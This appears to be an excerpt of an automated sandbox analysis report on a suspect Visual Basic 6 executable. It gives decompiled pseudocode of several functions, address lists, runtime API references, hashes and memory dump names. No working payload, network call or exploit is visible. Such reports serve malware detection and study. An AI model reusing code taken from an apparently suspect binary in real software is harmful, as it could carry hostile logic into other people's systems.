				_v28 = 0;
				_v32 = 0;
				_v48 = 0;
				_v52 = 0;
				__imp____vbaBoolVarNull(0x46c0e8);
				if(_t59 != 0) {
					_t71 =  *((intOrPtr*)( *_t107 + 0x334))(_t107);
					_t103 = __imp____vbaObjSet;
					 *_t103( &_v32, _t71);
					_v32 = 0;
					 *_t103( &_v28, _v32);
					E00462520(_t121,  &_v28, 0x46c0c8, 0x46c0d8, 0x46c0f8, 0x46c108);
					__imp____vbaFreeObjList(2,  &_v28,  &_v32);
					_t104 = __imp____vbaVarMove;
					_v40 = 0;
					_v48 = 0xb;
					 *_t104();
					_v40 = 0;
					_v48 = 0xb;
					 *_t104();
					_t81 = 0;
				}
				_t61 =  &_v28;
				__imp____vbaObjSet(_t61,  *((intOrPtr*)( *_t107 + 0x308))(_t107));
				_t101 = _t61;
				_t62 =  *((intOrPtr*)( *_t101 + 0xf0))(_t101,  &_v52);
				asm("fclex");
				if(_t62 >= _t81) {
					_t102 = __imp____vbaHresultCheckObj;
				} else {
					_t102 = __imp____vbaHresultCheckObj;
					 *_t102(_t62, _t101, 0x409314, 0xf0);
				}
				__imp____vbaFreeObj();
				_t63 = _v52;
				if(_t63 > 0x12) {
					L44:
					_t65 =  *((intOrPtr*)( *_t107 + 0x308))(_t107);
					__imp____vbaObjSet( &_v28, _t65);
					_t108 = _t65;
					_t66 =  *((intOrPtr*)( *_t108 + 0xf4))(_t108, 0);
					asm("fclex");
					if(_t66 < 0) {
						_t66 =  *_t102(_t66, _t108, 0x409314, 0xf4);
					}
					__imp____vbaFreeObj();
					goto L47;
				} else {
					switch( *((intOrPtr*)(_t63 * 4 +  &M0044CF2C))) {
						case 0:
							L47:
							_v8 = 0;
							_push(0x44cf0b);
							return _t66;
						case 1:
							_push(_t107);
							_t68 =  *((intOrPtr*)( *_t107 + 0x774))();
							if(_t68 >= 0) {
								goto L44;
							}
							_push(0x774);
							goto L43;
						case 2:
							_push(__esi);
							if( *((intOrPtr*)( *__esi + 0x804))() >= 0) {
								goto L44;
							}
							_push(0x804);
							goto L43;
						case 3:
							_push(__esi);
							if( *((intOrPtr*)( *__esi + 0x758))() >= 0) {
								goto L44;
							}
							_push(0x758);
							goto L43;
						case 4:
							__eax =  *__esi;
							_push(__esi);
							__eax =  *((intOrPtr*)( *__esi + 0x7ec))();
							if( *__esi >= 0) {
								goto L44;
							}
							_push(0x7ec);
							goto L43;
						case 5:
							_push(__esi);
							if( *((intOrPtr*)( *__esi + 0x724))() >= 0) {
								goto L44;
							}
							_push(0x724);
							goto L43;
						case 6:
							_push(__esi);
							if( *((intOrPtr*)( *__esi + 0x7c8))() >= 0) {
								goto L44;
							}
							_push(0x7c8);
							goto L43;
						case 7:
							__eax =  *__esi;
							_push(__esi);
							__eax =  *((intOrPtr*)( *__esi + 0x748))();
							if( *__esi >= 0) {
								goto L44;
							}
							_push(0x748);
							goto L43;
						case 8:
							_push(__esi);
							if( *((intOrPtr*)( *__esi + 0x7bc))() >= 0) {
								goto L44;
							}
							_push(0x7bc);
							goto L43;
						case 9:
							_push(__esi);
							if( *((intOrPtr*)( *__esi + 0x814))() >= 0) {
								goto L44;
							}
							_push(0x814);
							goto L43;
						case 0xa:
							__eax =  *__esi;
							_push(__esi);
							__eax =  *((intOrPtr*)( *__esi + 0x718))();
							if( *__esi >= 0) {
								goto L44;
							}
							_push(0x718);
							goto L43;
						case 0xb:
							_push(__esi);
							if( *((intOrPtr*)( *__esi + 0x7d0))() >= 0) {
								goto L44;
							}
							_push(0x7d0);
							goto L43;
						case 0xc:
							_push(__esi);
							if( *((intOrPtr*)( *__esi + 0x73c))() >= 0) {
								goto L44;
							}
							_push(0x73c);
							goto L43;
						case 0xd:
							__eax =  *__esi;
							_push(__esi);
							__eax =  *((intOrPtr*)( *__esi + 0x714))();
							if( *__esi >= 0) {
								goto L44;
							}
							_push(0x714);
							goto L43;
						case 0xe:
							_push(__esi);
							if( *((intOrPtr*)( *__esi + 0x71c))() >= 0) {
								goto L44;
							}
							_push(0x71c);
							goto L43;
						case 0xf:
							_push(__esi);
							if( *((intOrPtr*)( *__esi + 0x7cc))() >= 0) {
								goto L44;
							}
							_push(0x7cc);
							goto L43;
						case 0x10:
							__eax =  *__esi;
							_push(__esi);
							__eax =  *((intOrPtr*)( *__esi + 0x7b4))();
							if( *__esi >= 0) {
								goto L44;
							}
							_push(0x7b4);
							goto L43;
						case 0x11:
							_push(__esi);
							if( *((intOrPtr*)( *__esi + 0x734))() >= 0) {
								goto L44;
							}
							_push(0x734);
							goto L43;
						case 0x12:
							_push(__esi);
							if( *((intOrPtr*)( *__esi + 0x720))() >= 0) {
								goto L44;
							}
							_push(0x720);
							L43:
							_push(0x4085d8);
							_push(_t107);
							_push(_t68);
							 *_t102();
							goto L44;
					}
				}
			}

0x0044cba3
0x0044cbb2
0x0044cbbf
0x0044cbc2
0x0044cbc9
0x0044cbd1
0x0044cbd4
0x0044cbd8
0x0044cbdd
0x0044cbe0
0x0044cbe7
0x0044cbea
0x0044cbed
0x0044cbf0
0x0044cbf3
0x0044cbfc
0x0044cc05
0x0044cc0b
0x0044cc16
0x0044cc20
0x0044cc23
0x0044cc3d
0x0044cc4c
0x0044cc52
0x0044cc58
0x0044cc6b
0x0044cc6e
0x0044cc78
0x0044cc7f
0x0044cc82
0x0044cc84
0x0044cc84
0x0044cc90
0x0044cc94
0x0044cc9a
0x0044cca3
0x0044ccab
0x0044ccad
0x0044ccc5
0x0044ccaf
0x0044ccba
0x0044ccc1
0x0044ccc1
0x0044ccd1
0x0044ccd7
0x0044ccdd
0x0044ceaa
0x0044cead
0x0044ceb8
0x0044cebe
0x0044cec5
0x0044cecd
0x0044cecf
0x0044cedd
0x0044cedd
0x0044cee2
0x00000000
0x0044cce3
0x0044cce3
0x00000000
0x0044cee8
0x0044cee8
0x0044ceef
0x00000000
0x00000000
0x0044ccec
0x0044cced
0x0044ccf5
0x00000000
0x00000000
0x0044ccfb
0x00000000
0x00000000
0x0044cd07
0x0044cd10
0x00000000
0x00000000
0x0044cd16
0x00000000
0x00000000
0x0044cd22
0x0044cd2b
0x00000000
0x00000000
0x0044cd31
0x00000000
0x00000000
0x0044cd3b
0x0044cd3d
0x0044cd3e
0x0044cd46
0x00000000
0x00000000
0x0044cd4c
0x00000000
0x00000000
0x0044cd58
0x0044cd61
0x00000000
0x00000000
0x0044cd67
0x00000000
0x00000000
0x0044cd73
0x0044cd7c
0x00000000
0x00000000
0x0044cd82
0x00000000
0x00000000
0x0044cd8c
0x0044cd8e
0x0044cd8f
0x0044cd97
0x00000000
0x00000000
0x0044cd9d
0x00000000
0x00000000
0x0044cda9
0x0044cdb2
0x00000000
0x00000000
0x0044cdb8
0x00000000
0x00000000
0x0044cdc4
0x0044cdcd
0x00000000
0x00000000
0x0044cdd3
0x00000000
0x00000000
0x0044cddd
0x0044cddf
0x0044cde0
0x0044cde8
0x00000000
0x00000000
0x0044cdee
0x00000000
0x00000000
0x0044cdfa
0x0044ce03
0x00000000
0x00000000
0x0044ce09
0x00000000
0x00000000
0x0044ce15
0x0044ce1e
0x00000000
0x00000000
0x0044ce24
0x00000000
0x00000000
0x0044ce2b
0x0044ce2d
0x0044ce2e
0x0044ce36
0x00000000
0x00000000
0x0044ce38
0x00000000
0x00000000
0x0044ce41
0x0044ce4a
0x00000000
0x00000000
0x0044ce4c
0x00000000
0x00000000
0x0044ce55
0x0044ce5e
0x00000000
0x00000000
0x0044ce60
0x00000000
0x00000000
0x0044ce67
0x0044ce69
0x0044ce6a
0x0044ce72
0x00000000
0x00000000
0x0044ce74
0x00000000
0x00000000
0x0044ce7d
0x0044ce86
0x00000000
0x00000000
0x0044ce88
0x00000000
0x00000000
0x0044ce91
0x0044ce9a
0x00000000
0x00000000
0x0044ce9c
0x0044cea1
0x0044cea1
0x0044cea6
0x0044cea7
0x0044cea8
0x00000000
0x00000000
0x0044cce3

APIs

__vbaBoolVarNull.MSVBVM60(0046C0E8), ref: 0044CBF3
__vbaObjSet.MSVBVM60(?,00000000), ref: 0044CC16
__vbaObjSet.MSVBVM60(?,?), ref: 0044CC23

Part of subcall function 00462520: __vbaHresultCheckObj.MSVBVM60(00000000,660D9FF1,0040937C,00000148,?,00000000), ref: 00462569
Part of subcall function 00462520: __vbaHresultCheckObj.MSVBVM60(00000000,660D9FF1,0040937C,00000128,?,00000000), ref: 00462596
Part of subcall function 00462520: __vbaHresultCheckObj.MSVBVM60(00000000,660D9FF1,0040937C,0000014C,?,00000000), ref: 004625C0
Part of subcall function 00462520: __vbaHresultCheckObj.MSVBVM60(00000000,660D9FF1,0040937C,0000012C,?,00000000), ref: 004625E0
Part of subcall function 00462520: __vbaVarVargNofree.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,0044C9B2,?,0046C0C8), ref: 004625F9
Part of subcall function 00462520: __vbaR4Var.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,0044C9B2,?,0046C0C8), ref: 004625FC
Part of subcall function 00462520: __vbaVarVargNofree.MSVBVM60(?,?,00000000,?,?,?,?,?,?,?,?,?,?,0044C9B2,?,0046C0C8), ref: 0046260E
Part of subcall function 00462520: __vbaR4Var.MSVBVM60(00000000,?,?,00000000,?,?,?,?,?,?,?,?,?,?,0044C9B2,?), ref: 00462611
Part of subcall function 00462520: __vbaVarVargNofree.MSVBVM60(?,?,?,00000000,?,?,?,?,?,?,?,?,?,?,0044C9B2,?), ref: 00462623
Part of subcall function 00462520: __vbaR4Var.MSVBVM60(00000000,?,?,?,00000000,?,?,?,?,?,?,?,?,?,?,0044C9B2), ref: 00462626
Part of subcall function 00462520: __vbaVarVargNofree.MSVBVM60(?,?,?,?,00000000,?,?,?,?,?,?,?,?,?,?,0044C9B2), ref: 00462638

__vbaFreeObjList.MSVBVM60(00000002,?,?,?,0046C0C8,0046C0D8,0046C0F8,0046C108), ref: 0044CC4C
__vbaVarMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401E96), ref: 0044CC6E
__vbaVarMove.MSVBVM60 ref: 0044CC82
__vbaObjSet.MSVBVM60(?,00000000), ref: 0044CC94
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409314,000000F0), ref: 0044CCC1
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401E96), ref: 0044CCD1
__vbaHresultCheckObj.MSVBVM60(00000000,00401250,004085D8,00000774), ref: 0044CEA8
__vbaObjSet.MSVBVM60(?,00000000), ref: 0044CEB8
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409314,000000F4), ref: 0044CEDD
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401E96), ref: 0044CEE2

Memory Dump Source

Source File: 00000000.00000002.660946211.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.660941226.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661050174.0000000000460000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.661056537.0000000000461000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.661067161.000000000046C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661073801.000000000046E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661079197.0000000000470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661088372.0000000000484000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_boI88C399w.jbxd

Similarity

API ID: __vba$CheckHresult$NofreeVarg$Free$Move$BoolListNull
String ID:
API String ID: 44057718-0
Opcode ID: 2f8b1daf24be6cf05f841711f516df57bab3f29b7e33fcad4266c0908a445079
Instruction ID: bd3b2838df5b0fb6aeae67d65b5ff1c468c7708404dc4ac713dcb949a3e9bc8d
Opcode Fuzzy Hash: 2f8b1daf24be6cf05f841711f516df57bab3f29b7e33fcad4266c0908a445079
Instruction Fuzzy Hash: 6991C230A06601EFE7508F61CC88FAAB7E8BF54705F24413FF94AA6180D77D65429F99

Uniqueness

Uniqueness Score: -1.00%

Function 0044C910, Relevance: 19.7, APIs: 13, Instructions: 176
COMMON

Download Yara Rule

C-Code - Quality: 24%

			E0044C910(void* __ebx, void* __edi, void* __esi, char __fp0, signed int _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v28;
				char _v32;
				signed int _v40;
				signed int _v48;
				signed int _v52;
				void* _t46;
				intOrPtr* _t48;
				void* _t49;
				signed int _t50;
				intOrPtr* _t52;
				void* _t53;
				void* _t56;
				signed int _t66;
				intOrPtr* _t86;
				intOrPtr* _t87;
				intOrPtr* _t88;
				intOrPtr* _t89;
				signed int _t91;
				signed int _t92;
				intOrPtr* _t93;
				void* _t94;
				void* _t96;
				intOrPtr _t97;

				_t97 = _t96 - 0xc;
				 *[fs:0x0] = _t97;
				_v16 = _t97 - 0x34;
				_v12 = E00401240;
				_t91 = _a4;
				_v8 = _t91 & 0x00000001;
				_t92 = _t91 & 0xfffffffe;
				_a4 = _t92;
				_t46 =  *((intOrPtr*)( *_t92 + 4))(_t92, __edi, __esi, __ebx,  *[fs:0x0], 0x401e96, _t94);
				_t66 = 0;
				_v28 = 0;
				_v32 = 0;
				_v48 = 0;
				_v52 = 0;
				__imp____vbaBoolVarNull(0x46c0e8);
				if(_t46 != 0) {
					_t56 =  *((intOrPtr*)( *_t92 + 0x334))(_t92);
					_t88 = __imp____vbaObjSet;
					 *_t88( &_v32, _t56);
					_v32 = 0;
					 *_t88( &_v28, _v32);
					E00462520(__fp0,  &_v28, 0x46c0c8, 0x46c0d8, 0x46c0f8, 0x46c108);
					__imp____vbaFreeObjList(2,  &_v28,  &_v32);
					_t89 = __imp____vbaVarMove;
					_v40 = 0;
					_v48 = 0xb;
					 *_t89();
					_v40 = 0;
					_v48 = 0xb;
					 *_t89();
					_t66 = 0;
				}
				_t48 =  &_v28;
				__imp____vbaObjSet(_t48,  *((intOrPtr*)( *_t92 + 0x304))(_t92));
				_t86 = _t48;
				_t49 =  *((intOrPtr*)( *_t86 + 0xf0))(_t86,  &_v52);
				asm("fclex");
				if(_t49 >= _t66) {
					_t87 = __imp____vbaHresultCheckObj;
				} else {
					_t87 = __imp____vbaHresultCheckObj;
					 *_t87(_t49, _t86, 0x409314, 0xf0);
				}
				__imp____vbaFreeObj();
				_t50 = _v52;
				if(_t50 > 8) {
					L21:
					_t52 =  &_v28;
					__imp____vbaObjSet(_t52,  *((intOrPtr*)( *_t92 + 0x304))(_t92));
					_t93 = _t52;
					_t53 =  *((intOrPtr*)( *_t93 + 0xf4))(_t93, 0);
					asm("fclex");
					if(_t53 < 0) {
						_t53 =  *_t87(_t53, _t93, 0x409314, 0xf4);
					}
					__imp____vbaFreeObj();
					goto L24;
				} else {
					switch( *((intOrPtr*)(_t50 * 4 +  &M0044CB78))) {
						case 0:
							L24:
							_v8 = 0;
							_push(0x44cb59);
							return _t53;
						case 1:
							__eax =  *__esi;
							_push(__esi);
							__eax =  *((intOrPtr*)( *__esi + 0x788))();
							if(__eax >= 0) {
								goto L21;
							}
							_push(0x788);
							goto L20;
						case 2:
							_push(__esi);
							__eax =  *((intOrPtr*)( *__esi + 0x78c))();
							if(__eax >= 0) {
								goto L21;
							}
							_push(0x78c);
							goto L20;
						case 3:
							_push(__esi);
							__eax =  *((intOrPtr*)( *__esi + 0x790))();
							if(__eax >= 0) {
								goto L21;
							}
							_push(0x790);
							goto L20;
						case 4:
							 *0x46c05c = 0x19;
							__eax = E00461350(__ebx, __edi, __esi);
							goto L21;
						case 5:
							__eax =  *__esi;
							_push(__esi);
							__eax =  *((intOrPtr*)( *__esi + 0x828))();
							if(__eax >= 0) {
								goto L21;
							}
							_push(0x828);
							goto L20;
						case 6:
							 *0x46c05c = 0x14;
							E00461350(_t67, _t87, _t92);
							goto L21;
						case 7:
							 *0x46c05c = 0x15;
							__eax = E00461350(__ebx, __edi, __esi);
							goto L21;
						case 8:
							_push(__esi);
							__eax =  *((intOrPtr*)( *__esi + 0x7f4))();
							if(__eax >= 0) {
								goto L21;
							}
							_push(0x7f4);
							L20:
							_push(0x4085d8);
							_push(__esi);
							_push(__eax);
							__eax =  *__edi();
							goto L21;
					}
				}
			}

0x0044c913
0x0044c922
0x0044c92f
0x0044c932
0x0044c939
0x0044c941
0x0044c944
0x0044c948
0x0044c94d
0x0044c950
0x0044c957
0x0044c95a
0x0044c95d
0x0044c960
0x0044c963
0x0044c96c
0x0044c975
0x0044c97b
0x0044c986
0x0044c990
0x0044c993
0x0044c9ad
0x0044c9bc
0x0044c9c2
0x0044c9c8
0x0044c9db
0x0044c9de
0x0044c9e8
0x0044c9ef
0x0044c9f2
0x0044c9f4
0x0044c9f4
0x0044ca00
0x0044ca04
0x0044ca0a
0x0044ca13
0x0044ca1b
0x0044ca1d
0x0044ca35
0x0044ca1f
0x0044ca2a
0x0044ca31
0x0044ca31
0x0044ca41
0x0044ca47
0x0044ca4d
0x0044caf8
0x0044cb02
0x0044cb06
0x0044cb0c
0x0044cb13
0x0044cb1b
0x0044cb1d
0x0044cb2b
0x0044cb2b
0x0044cb30
0x00000000
0x0044ca53
0x0044ca53
0x00000000
0x0044cb36
0x0044cb36
0x0044cb3d
0x00000000
0x00000000
0x0044ca8d
0x0044ca8f
0x0044ca90
0x0044ca98
0x00000000
0x00000000
0x0044ca9a
0x00000000
0x00000000
0x0044caa3
0x0044caa4
0x0044caac
0x00000000
0x00000000
0x0044caae
0x00000000
0x00000000
0x0044cab7
0x0044cab8
0x0044cac0
0x00000000
0x00000000
0x0044cac2
0x00000000
0x00000000
0x0044ca7d
0x0044ca86
0x00000000
0x00000000
0x0044cac9
0x0044cacb
0x0044cacc
0x0044cad4
0x00000000
0x00000000
0x0044cad6
0x00000000
0x00000000
0x0044ca5a
0x0044ca63
0x00000000
0x00000000
0x0044ca6d
0x0044ca76
0x00000000
0x00000000
0x0044cadf
0x0044cae0
0x0044cae8
0x00000000
0x00000000
0x0044caea
0x0044caef
0x0044caef
0x0044caf4
0x0044caf5
0x0044caf6
0x00000000
0x00000000
0x0044ca53

APIs

__vbaBoolVarNull.MSVBVM60(0046C0E8), ref: 0044C963
__vbaObjSet.MSVBVM60(?,00000000), ref: 0044C986
__vbaObjSet.MSVBVM60(?,?), ref: 0044C993

Part of subcall function 00462520: __vbaHresultCheckObj.MSVBVM60(00000000,660D9FF1,0040937C,00000148,?,00000000), ref: 00462569
Part of subcall function 00462520: __vbaHresultCheckObj.MSVBVM60(00000000,660D9FF1,0040937C,00000128,?,00000000), ref: 00462596
Part of subcall function 00462520: __vbaHresultCheckObj.MSVBVM60(00000000,660D9FF1,0040937C,0000014C,?,00000000), ref: 004625C0
Part of subcall function 00462520: __vbaHresultCheckObj.MSVBVM60(00000000,660D9FF1,0040937C,0000012C,?,00000000), ref: 004625E0
Part of subcall function 00462520: __vbaVarVargNofree.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,0044C9B2,?,0046C0C8), ref: 004625F9
Part of subcall function 00462520: __vbaR4Var.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,0044C9B2,?,0046C0C8), ref: 004625FC
Part of subcall function 00462520: __vbaVarVargNofree.MSVBVM60(?,?,00000000,?,?,?,?,?,?,?,?,?,?,0044C9B2,?,0046C0C8), ref: 0046260E
Part of subcall function 00462520: __vbaR4Var.MSVBVM60(00000000,?,?,00000000,?,?,?,?,?,?,?,?,?,?,0044C9B2,?), ref: 00462611
Part of subcall function 00462520: __vbaVarVargNofree.MSVBVM60(?,?,?,00000000,?,?,?,?,?,?,?,?,?,?,0044C9B2,?), ref: 00462623
Part of subcall function 00462520: __vbaR4Var.MSVBVM60(00000000,?,?,?,00000000,?,?,?,?,?,?,?,?,?,?,0044C9B2), ref: 00462626
Part of subcall function 00462520: __vbaVarVargNofree.MSVBVM60(?,?,?,?,00000000,?,?,?,?,?,?,?,?,?,?,0044C9B2), ref: 00462638

__vbaFreeObjList.MSVBVM60(00000002,?,?,?,0046C0C8,0046C0D8,0046C0F8,0046C108), ref: 0044C9BC
__vbaVarMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401E96), ref: 0044C9DE
__vbaVarMove.MSVBVM60 ref: 0044C9F2
__vbaObjSet.MSVBVM60(?,00000000), ref: 0044CA04
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409314,000000F0), ref: 0044CA31
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401E96), ref: 0044CA41
__vbaObjSet.MSVBVM60(?,00000000), ref: 0044CB06
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409314,000000F4), ref: 0044CB2B
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401E96), ref: 0044CB30

Memory Dump Source

Source File: 00000000.00000002.660946211.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.660941226.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661050174.0000000000460000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.661056537.0000000000461000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.661067161.000000000046C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661073801.000000000046E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661079197.0000000000470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661088372.0000000000484000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_boI88C399w.jbxd

Similarity

API ID: __vba$CheckHresult$NofreeVarg$Free$Move$BoolListNull
String ID:
API String ID: 44057718-0
Opcode ID: 851752e07e5372ed6b66a155f9b730b8072ab153532f8e047bd597ec242cb44a
Instruction ID: ae503da3ad235aa07c114904b17c3a6c6b3684b2df816d5011f3e921582e99e2
Opcode Fuzzy Hash: 851752e07e5372ed6b66a155f9b730b8072ab153532f8e047bd597ec242cb44a
Instruction Fuzzy Hash: DB51B270A41209EBD700DFA5CC89BEEB7B8FF09704F14813AE945B7190DB7859468F9A

Uniqueness

Uniqueness Score: -1.00%

Function 0045FFA0, Relevance: 18.1, APIs: 12, Instructions: 109COMMON

Download Yara Rule

APIs

__vbaUbound.MSVBVM60(00000001,00000000,?,?,?,?,?,?,?,?,00401E96), ref: 0045FFE5
__vbaLbound.MSVBVM60(00000001,?,?,?,?,?,?,?,?,?,00401E96), ref: 0045FFF6
__vbaUbound.MSVBVM60(00000001,00000000,?,?,?,?,?,?,?,?,00401E96), ref: 00460013
__vbaUbound.MSVBVM60(00000001,?,?,?,?,?,?,?,?,?,00401E96), ref: 00460028
__vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,00401E95,00000000,?,?,?,?,?,?,?,?,00401E96), ref: 0046004E
__vbaAryLock.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00401E96), ref: 00460064
__vbaAryLock.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401E96), ref: 0046006E
__vbaSetSystemError.MSVBVM60(?,?,00401E96,?,?,?,?,?,?,?,?,?,?,?,?,00401E96), ref: 0046008E
__vbaAryUnlock.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00401E96), ref: 0046009E
__vbaAryUnlock.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00401E96), ref: 004600A4
__vbaAryMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401E96), ref: 004600AE
__vbaAryDestruct.MSVBVM60(00000000,?,004600ED,?,?,?,?,?,?,?,?,00401E96), ref: 004600E6

Memory Dump Source

Source File: 00000000.00000002.660946211.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.660941226.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661050174.0000000000460000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.661056537.0000000000461000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.661067161.000000000046C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661073801.000000000046E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661079197.0000000000470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661088372.0000000000484000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_boI88C399w.jbxd

Similarity

API ID: __vba$Ubound$LockUnlock$DestructErrorLboundMoveRedimSystem
String ID:
API String ID: 926406857-0
Opcode ID: 10cecad4a383fba8e586745bec478892159a238b2c8d66e1251510906506e6e2
Instruction ID: cbf5d7ed3f1aececb1da595f373d9ae0af61f741768d461ccd625a43937cd824
Opcode Fuzzy Hash: 10cecad4a383fba8e586745bec478892159a238b2c8d66e1251510906506e6e2
Instruction Fuzzy Hash: E8413175A00205AFDB04DFA4DD85FAEB7B8EF4C700F10811AEA05A7290E775A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00457EA0, Relevance: 16.7, APIs: 11, Instructions: 159
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E00457EA0(void* __ebx, void* __edi, void* __esi, signed int _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v28;
				signed int _v32;
				char _v36;
				char _v40;
				intOrPtr _v44;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				intOrPtr* _v80;
				intOrPtr _t46;
				void* _t48;
				intOrPtr* _t49;
				void* _t50;
				intOrPtr* _t52;
				intOrPtr _t53;
				void* _t55;
				intOrPtr* _t56;
				void* _t57;
				signed int _t58;
				void* _t59;
				signed int _t64;
				signed int _t65;
				intOrPtr* _t67;
				intOrPtr* _t84;
				intOrPtr* _t88;
				intOrPtr* _t89;
				intOrPtr* _t91;
				intOrPtr* _t92;
				intOrPtr* _t93;
				void* _t94;
				void* _t96;
				intOrPtr _t97;
				intOrPtr _t98;

				_t97 = _t96 - 0xc;
				 *[fs:0x0] = _t97;
				_t98 = _t97 - 0x48;
				_v16 = _t98;
				_v12 = 0x401798;
				_t64 = _a4;
				_v8 = _t64 & 0x00000001;
				_t65 = _t64 & 0xfffffffe;
				_a4 = _t65;
				 *((intOrPtr*)( *_t65 + 4))(_t65, __edi, __esi, __ebx,  *[fs:0x0], 0x401e96, _t94);
				_t46 =  *0x46c7c0; // 0x29e254c
				_v28 = 0;
				_v32 = 0;
				_v36 = 0;
				_v40 = 0;
				_v56 = 0;
				_v60 = 0;
				if(_t46 == 0) {
					__imp____vbaNew2(0x4095dc, 0x46c7c0);
				}
				_t88 =  *0x46c7c0; // 0x29e254c
				_t48 =  *((intOrPtr*)( *_t88 + 0x1c))(_t88,  &_v28);
				asm("fclex");
				if(_t48 >= 0) {
					_t84 = __imp____vbaHresultCheckObj;
				} else {
					_t84 = __imp____vbaHresultCheckObj;
					 *_t84(_t48, _t88, 0x4095cc, 0x1c);
				}
				_t49 = _v28;
				_t89 = _t49;
				_t50 =  *((intOrPtr*)( *_t49 + 0x64))(_t49, 2,  &_v60);
				asm("fclex");
				if(_t50 < 0) {
					_t50 =  *_t84(_t50, _t89, 0x409ad4, 0x64);
				}
				__imp____vbaFreeObj();
				if(_v60 != 0) {
					_t52 =  *((intOrPtr*)( *_t65 + 0x334))(_t65);
					__imp____vbaObjSet( &_v40, _t52);
					_v80 = _t52;
					_t53 =  *0x46c7c0; // 0x29e254c
					if(_t53 == 0) {
						__imp____vbaNew2(0x4095dc, 0x46c7c0);
					}
					_t91 =  *0x46c7c0; // 0x29e254c
					_t55 =  *((intOrPtr*)( *_t91 + 0x1c))(_t91,  &_v28);
					asm("fclex");
					if(_t55 < 0) {
						 *_t84(_t55, _t91, 0x4095cc, 0x1c);
					}
					_t56 = _v28;
					_t67 = _t98 - 0x10;
					_t92 = _t56;
					 *_t67 = 3;
					 *((intOrPtr*)(_t67 + 4)) = _v52;
					 *((intOrPtr*)(_t67 + 8)) = 2;
					 *((intOrPtr*)(_t67 + 0xc)) = _v44;
					_t57 =  *((intOrPtr*)( *_t56 + 0x54))(_t56,  &_v32);
					asm("fclex");
					if(_t57 < 0) {
						__imp____vbaHresultCheckObj(_t57, _t92, 0x409ad4, 0x54);
					}
					_t58 = _v32;
					_t93 = _v80;
					_v32 = 0;
					_t86 =  *_t93;
					__imp____vbaObjSet( &_v36, _t58);
					_t59 =  *((intOrPtr*)( *_t93 + 0x64))(_t93, _t58);
					asm("fclex");
					if(_t59 < 0) {
						__imp____vbaHresultCheckObj(_t59, _t93, 0x40937c, 0x64);
					}
					__imp____vbaFreeObjList(3,  &_v28,  &_v36,  &_v40);
					_t50 = E00461D90(_t67, _t86, _t93);
				}
				_v8 = 0;
				_push(0x458084);
				return _t50;
			}

0x00457ea3
0x00457eb2
0x00457eb9
0x00457ebf
0x00457ec2
0x00457ec9
0x00457ed1
0x00457ed4
0x00457ed8
0x00457edd
0x00457ee0
0x00457ee9
0x00457eec
0x00457eef
0x00457ef2
0x00457ef5
0x00457ef8
0x00457efb
0x00457f07
0x00457f07
0x00457f0d
0x00457f1a
0x00457f1f
0x00457f21
0x00457f36
0x00457f23
0x00457f23
0x00457f32
0x00457f32
0x00457f3c
0x00457f48
0x00457f4a
0x00457f4f
0x00457f51
0x00457f5c
0x00457f5c
0x00457f65
0x00457f6e
0x00457f77
0x00457f82
0x00457f88
0x00457f8b
0x00457f92
0x00457f9e
0x00457f9e
0x00457fa4
0x00457fb1
0x00457fb6
0x00457fb8
0x00457fc3
0x00457fc3
0x00457fc8
0x00457fd6
